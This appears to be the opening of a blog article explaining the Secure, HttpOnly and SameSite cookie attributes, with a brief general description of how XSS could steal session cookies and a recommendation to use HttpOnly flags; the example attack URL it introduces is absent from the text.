Secure, HttpOnly, SameSite HTTP Cookies Attributes and Set-Cookie Explained
Cookies are the most common method to add temporary persistency to websites. They are used in most websites and we know their consent banners. HTTP Cookies can contain crucial and confidential data, their usage started around 1994 and some important legacy issue were left unaddressed and new state-of-art security improvements are being tackled nowadays.
SameSite cookies attributes are being addressed by some modern browsers for quite some time and soon they will be enforced.
For example, starting from August 25, 2020, Google Chrome v85 enabled a feature, by default, to reject insecure
SameSite=None. New features like this might break your website if you aren’t up-to-date with the latest best practices. Like that example, using the following attributes already are considered best practices and modern browsers will(and should) enforce them soon.
In this article I’m going to explain each one, the reasons why developers should care about them and why a correct implementation of them means extra security for your website.
Avoiding XSS may be mitigated just by sanitising user inputs and removing
<script> tags, one small mistake can have huge consequences. Third party script might break user security as well. Every year we hear about these attacks being successful.
Imagine your webpage is storing a session cookie and there is some input field vulnerable to XSS. Then it’s quite straight-forward for an attack to inject script making a HTTP request to a url similar to the following:
To prevent these hacks, we should be using
HttpOnly flags in cookies.